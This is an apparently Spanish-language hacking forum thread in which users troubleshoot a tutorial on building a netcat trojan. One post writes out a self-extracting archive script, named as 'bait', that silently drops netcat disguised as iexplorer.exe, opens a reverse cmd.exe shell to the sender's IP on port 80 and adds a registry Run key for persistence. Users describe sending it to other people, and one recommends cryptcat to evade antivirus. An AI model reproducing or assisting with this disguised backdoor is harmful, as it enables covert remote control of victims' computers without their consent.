Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 1 Visitante están viendo este tema.

darkirax

gracias mañana lo voy a provar

Genex

#391
Hola soy nuevo aca y estoy muy agradecido por toda la ayuda que le brindan a las personas que quieren empezar en esto (Me incluyo).
He estado leyendo y leyendo y resulta que no puedo resolver el problema que muchos tienen en Jugando con Netcat Parte 1:

"Windows no puede encontrar el archivo iexplorer.exe  y etc ........ "

Aca dejo el comentario de la Carnada.exe

El comentario siguiente contiene secuencias de órdenes para SFX

Path=%homedrive%%homepath%\update
SavePath
Setup=iexplorer.exe -d -e cmd.exe MI IP. 80
Presetup=%windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe MI IP. 80" /f > nul
Silent=1
Overwrite=2

Tengo 2 archivos , el carnada.exe y otro que es el nc pero que lo reenombre iexplorer.exe

Estoy usando NetCat V1.0 y desinstale el NOD32 para ver si me funcionaba. Tambien desactive el Firewall de windows y nada, el mismo error siempre.

Muchas gracias a todos nuevamente, espero que me ayuden.
Atte,
Genex.


PROBLEMA ARREGLADO...

Genex

Tengo otro problemilla ahora...

Sobre el error " h_errno 11001: HOST_NOT_FOUND " WKL dijo que habia un error en la compilacion del winsock.h y dió un link para arreglar este problema pero resulta que no me funciona el link.
Alguien sabe de donde puedo bajar ese fix?
Gracias

strongermind

me dize que iexplorer no es una aplikazion win32 valida
que puedo azer¿?

Genex

Tengo un problemilla.
Cuando mando el troyano del Jugando con Netcat parte 1 a cualquier persona, primero dejo en escucha el puerto 80, pero cuando lo abren pasan horas y no pasa nada. Porque será?

Gracias..

PD: Ayer me tiro un error " h_errno 11001: HOST_NOT_FOUND " pero desde hoydia nisiquiera escucha nada.

LNXMASTER

chicos.. tengo un problema... capas que ya lo hablaron... pero no se,
el tema es el siguiente... yo armo todo el troyano con el netcat pero cuando lo ejecuto en mi pc me dice q la ruta de acceso es invalida.... que hago? ya probe sin cambiarle el icono. puse todo como estaba en el manual... cual es el problema?

softdates

#396

D4RIO

Hay algunas cosa que deberian saber antes de postear preguntas:

1- El buscador no muerde: No es necesario leer todo el tema para encontrar una respuesta, el boton buscar lo hara por ustedes ; )

2- Leer algo de redes y seguridad informatica es indispensable, ya que muchos fracasan por desconocer cuestiones minimas. Un buen comienzo es el documental sobre Piratas Informaticos que podran encontrar en YouTube, en el que genios como Kevin Mitnick cuentan su experiencia. Ahi entenderan que gran parte de la penetracion de un sistema es paciencia.

3- Netcat no es la unica herramienta util. hay muchas cosas interesantes en www.thc.org, y cryptcat tambien es una buena opcion, en particular he logrado que no lo detecten muchos antivirus y herramientas.
OpenBSDFreeBSD

Frodcord

Primero quiero felicitarlos por el tuto y luego deseo que me contesten unas interrogantes.

Cuando troyanizo el netcat todo me sale bien, me crea la carpeta update, se hace el registro, etc.......Pero no me quiere dar nisiquiera mi shell se queda en que esta oyendo el puerto 80 y de ahi pasa mucho tiempo y no prosigue. Tengo una ip estatica, el puerto abierto en el router, apague el firewall, no tengo antivirus.

Podria alguien decirme donde esta el error?

Rigor Mortis

he hecho el troyano con netcat i tal pero no me sale lo que tu tienes en las imagenes.:
C:\>nc -vv -L -p 80
listening on [any] 80 ...
connect to [mi ip] from 37.Red-88-15-251.dynamicIP.rima-tde.net [mi ip] 3777
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwav
e-flash, application/x-gsarcade-launch, */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.5072
7)
Host: p4
Connection: Keep-Alive

sent 0, rcvd 394
listening on [mi ip] 80 ...

ALguien me puede decir que es esto? O que he hecho mal?